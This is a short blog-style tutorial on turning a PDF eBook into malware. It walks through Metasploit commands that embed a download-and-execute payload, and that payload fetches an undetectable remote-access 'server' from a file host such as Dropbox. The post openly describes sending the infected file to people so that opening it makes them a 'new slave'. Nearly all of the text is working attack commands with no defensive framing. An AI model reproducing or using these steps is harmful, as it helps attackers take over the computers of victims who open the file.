Metasploit, a PDF eBook and a FUD server.
Metasploit can be downloaded http://www.rapid7.com/products/metasploit/download.jsp
Search the web for free eBooks
Make your PDF file ready, upload your FUD server to a hosting service which provides direct download links, I would use Dropboxhttps://www.dropbox.com/ or Zalil http://www.zalil.ru/
And make sure that you have installed Metasploit correctly!
Now we will infect the PDF file
1. Open up Metasploit console
2. Type this in the console:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
3. Type this in the console:
set payload windows/download_exec
4. Type this in console:
set INFILENAME <location of your pdf to infect here>
EXAMPLE: set INFILENAME C:/Users/Owner/Desktop/example.pdf
5. Type this in console:
set url <direct download link to your fud server>
EXAMPLE: set url http://download.com/server.exe
6. Type this in console:
Exploit
Now you have infected your PDF file and you will be ready to send it out, when people open the infected PDF file then it will download your server and *BAM* new slave.
(The infected PDF file will be in the same directory as the original and will be named “evil.pdf”)
Bagikan
pdf evil
4/
5
Oleh
Unknown
